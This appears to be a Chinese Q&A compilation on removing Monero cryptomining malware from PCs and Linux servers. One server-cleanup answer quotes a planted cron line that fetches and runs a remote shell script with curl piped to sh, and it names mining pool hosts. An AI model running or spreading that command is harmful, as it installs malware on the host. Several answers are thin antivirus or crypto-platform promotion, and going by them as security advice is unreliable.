xmr挖矿病毒

㈠ 门罗币挖矿病毒，怎么查杀

可以安装一些杀毒软件在电脑上 如360安全卫士一类的，然后一直保持开启 这样就可以预防病毒进入到电脑当中了，如果已经中毒在安全模式里面使用360急救箱查收。

㈡ 电脑被xmr-eu2.nanopool.org:14433占用资源是怎么回事

在(2)这个进程上右键，打开文件位置，看看能不能找到这个(2).exe的程序文件。如果能的话，就在任务管理器右键结束进程，然后删除这个(2)的文件。
建议不要关闭防火墙、defender等自带杀毒软件。也不要关闭windows的访问通知权限。这样就不会被这些奇怪的病毒或垃圾程序困扰。

㈢ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

㈣ 为啥XMR的挖坑软件都被杀毒软件干掉

是否不安全，试试腾讯电脑管家查杀，在云查杀引擎中，电脑管家首次启用了微特征技术。微特征技术极大的提高云查杀引擎对最新病毒的反应速度，增强了云查杀引擎应对复杂病毒时的能力。以往传统的云查杀引擎相当于收集了所有病毒犯罪分子的照片，虽然可以通过照片准确的比对出犯罪分子，但是只要犯罪分子换一身衣服，或者化化妆，传统的云引擎就需要重新再次收集信息识别。

㈤ 如何防范门罗币挖矿病毒

要用360来保护自己的电脑，和在全国在最大数字资产中币平台管理自己的门罗币比较放心安全

㈥ Linux系统被Carbon挖矿病毒入侵，杀掉之后过一段时间又起来了，有谁遇到过这种情况啊

这种病毒腾讯安全提到过
可以去下载安装一个腾讯御点
打开之后，使用里面的病毒查杀功能，直接就可以查杀这种电脑病毒了

㈦ 为什么挖矿病毒（木马）多数挖门罗币

试试腾讯电脑管家查杀，杀毒管理2合1，木马查杀升级为专业杀毒，查杀更彻底；集成金山云查杀引擎、小红伞本地查杀引擎电脑管家自身反病毒引擎，全面保障病毒查杀效果。加上电脑管家系统修复引擎，当检测出系统问题的时候，还能帮助用户修复系统。

㈧ 笔记本老显示monero(xmr )cpu miner已停止工作什么意思

这个和系统的svchost.exe很像，删除过后一直自动新建出来。
一开始没找到问题之前做了一个任务，每1分钟用taskkill删除这个进行，先缓解一下，然后系统运行的每一个进行都用打开文件位置的方式来确定，找到了一个TEMP文件夹里面的文件，删除掉，另外那个程序就不会再新建出来了。

㈨ 电脑中了挖坑病毒，xmr这个软件不断重装，无法彻底删除，怎么办急

如果实在弄不了，这个就重新找个官方纯净系统安装包重装系统去了。